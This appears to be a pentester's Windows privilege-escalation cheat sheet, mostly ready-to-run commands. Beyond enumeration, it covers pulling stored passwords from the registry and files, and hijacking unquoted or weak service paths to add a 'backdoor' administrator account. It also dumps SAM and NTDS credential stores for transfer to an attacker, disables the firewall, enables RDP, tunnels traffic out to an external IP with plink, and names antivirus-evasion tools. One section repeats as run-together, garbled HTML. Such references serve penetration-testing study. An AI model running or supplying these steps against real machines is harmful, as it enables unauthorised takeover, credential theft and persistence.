Windows Privilege Escalation
2024-03-19 13:16:17

Host Info

1
2
3
4
5
6
7
ver
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
tasklist /v
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
wmic os get Caption, CSDVersion /value

User Info

1
2
3
4
5
6
7
8
9
10
11
12
whoami
echo %username%
net user
net user (username)
echo %userprofile%
net localgroup
net config Workstation | find "User name"
query user
wmic useraccount get name
wmic /node: "127.0.0.1" computersystem get username
qwinsta
cmdkey /list

Environment Info

1
2
set
net

Domain Info

1
2
3
4
5
6
net view /domain
net view /domain:THINC
net localgroup “Administrators”
net group "Domain Admins" /domain 
net share 
net session | find / "\\"

Network Info

1
2
3
4
ipconfig /all
route print
arp -A
netstat -ano

User Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
whoami
echo %username%
net user
net user (username)
echo %userprofile%
net localgroup
net config Workstation | find "User name"
query user
wmic useraccount get name
wmic /node: "127.0.0.1" computersystem get username
qwinsta
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword

Password Enumeration

1
2
3
4
5
6
7
8
cmdkey /list
Simple File Search: 
dir /s *password*  
findstr /s /n /i /p password *  
findstr /si password *.txt
dir /s *secret*  
findstr /s /n /i /p secret *  
findstr /si secret *.txt

Scheduled Tasks

1
2
3
schtasks /query
schtasks /query /v /fo LIST
Get-ScheduledTask | Where State -EQ 'Ready'

Patch Levels (KE)

1
2
3
4
5
6
7
8
9
systeminfo 

wmic qfe get Caption,Description,HotFixID,InstalledOn

Notes
Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11- 080 (KB2592799)
After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing
Search patches for given patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

Writable Files

1
2
3
4
5
6
7
8
dir /a-r-d /s /b

Notes

/a is to search for attributes. In this case r is read only and d is directory. The minus signs negate those attributes. So we're looking for writable files only.

/s means recurse subdirectories
/b means bare format. Path and filename only.

Unquoted Service Paths

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
List all unquoted service paths (minus built-in Windows services) on our compromised machine:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Suppose we found:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

If you look at the registry entry for this service with Regedit you can see the ImagePath value is:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

To be secure it should be like this:
 “C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”
When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
   C:\Program.exe
   C:\Program Files.exe
   C:\Program Files(x86)\Program Folder\A.exe

Check permissions of folder path
   icacls "C:\Program Files (x86)\Program Folder"

If we can write in the path we plant a backdoor with the same name with the service and restart the service.

Metasploit module:

exploit/windows/local/trusted_service_path

Weak Service Permissions

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\
Then query the service using Windows sc: 
sc qc <vulnerable service name>

Then change the binpath to execute your own commands (restart of the service will most likely be needed): 

sc config <vuln-service> binpath= "net user backdoor backdoor123 /add" 
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add" 
sc stop <vuln-service>
sc start <vuln-service>
Note - Might need to use the depend attribute explicitly: 
sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>


Metasploit module: 
exploit/windows/local/service_permissions
<a href="https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exeaccesschk.exe -uwcqv "Authenticated Users" * /accepteulaaccesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteulaaccesschk.exe -qdws Users C:\Windows\Then query the service using Windows sc: sc qc <vulnerable service name>Then change the binpath to execute your own commands (restart of the service will most likely be needed): sc config <vuln-service> binpath= "net user backdoor backdoor123 /add" sc stop <vuln-service>sc start <vuln-service>sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add" sc stop <vuln-service>sc start <vuln-service>Note - Might need to use the depend attribute explicitly: sc stop <vuln-service>sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""sc start

SAM Dumping

1
2
3
4
5
6
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System

# Transfer SAM and System to attacker then:

samdump2 System SAM

NTDS Dumping

  • need privs (SeBackupPrivilege)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    # save this in script.txt
    set metadata C:\Windows\Temp\meta.cabX
    set context clientaccessibleX
    set context persistentX
    begin backupX
    add volume C: alias cdriveX
    createX
    expose %cdrive% E:X
    end backupX
     
    # run diskshadow
    diskshadow /s script.txt
     
    # copy ntds to c
    robocopy /b E:\Windows\ntds . ntds.dit

Post Exploitation

  • Add Users

    1
    2
    3
    net user username password /add
    net localgroup Administrators username /add
    net localgroup “Remote Desktop Users” username /add

  • psexec.exe -accepteula \\10.11.10.167 -u hostname\username -p password cmd /c ipconfig

  • RunAs

    1
    runas /user:hostname\<username> explorer.exe

  • Disable Firewall
    Remember, windows firewall is implicit block all incoming and implicit allow all outgoing

    1
    2
    3
    4
    netsh firewall show state
    netsh firewall show config
    netsh advfirewall firewall show rule all
    netsh advfirewall set allprofiles state off

  • RDP

    1
    2
    3
    4
    5
    6
    7
    8
    # Enable RDP
    reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

    # Old RDP ker cred login bullshit
    reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f

    # Local Remote port forward Plink (Use to tunnel out RDP, SMB, etc. etc.)
        plink.exe -l <user> -pw <password> 10.11.0.70 -R 9595:localhost:445

  • AV Evasion

    1
    2
    veil-evasion
    hyperion.exe

Extra

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

2024-03-19 13:16:17